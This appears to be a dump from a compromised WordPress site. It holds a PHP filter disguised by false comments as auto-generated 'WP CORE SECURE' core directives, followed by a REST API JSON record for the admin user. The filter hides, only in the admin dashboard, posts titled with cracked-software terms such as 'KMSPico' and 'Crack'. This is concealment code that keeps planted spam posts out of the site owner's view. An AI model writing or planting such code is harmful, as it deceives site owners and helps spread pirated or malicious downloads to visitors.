# BEGIN WP CORE SECURE
# The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.

function exclude_posts_by_titles($where, $query) {
    global $wpdb;

    if (is_admin() && $query->is_main_query()) {
        $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop'];

        foreach ($keywords as $keyword) {
            $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%");
        }
    }
    return $where;
}

add_filter('posts_where', 'exclude_posts_by_titles', 10, 2);

# END WP CORE SECURE{"id":1,"name":"admin","url":"https:\/\/netstudio.webdev.is","description":"","link":"https:\/\/netstudio.webdev.is\/index.php\/author\/agust23-is\/","slug":"agust23-is","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f92c0a47e40f797c448fecd27fbfc4fbdb43898cd20bfb69e36835064d8fb03d?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f92c0a47e40f797c448fecd27fbfc4fbdb43898cd20bfb69e36835064d8fb03d?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f92c0a47e40f797c448fecd27fbfc4fbdb43898cd20bfb69e36835064d8fb03d?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/netstudio.webdev.is\/index.php\/wp-json\/wp\/v2\/users\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/netstudio.webdev.is\/index.php\/wp-json\/wp\/v2\/users"}]}}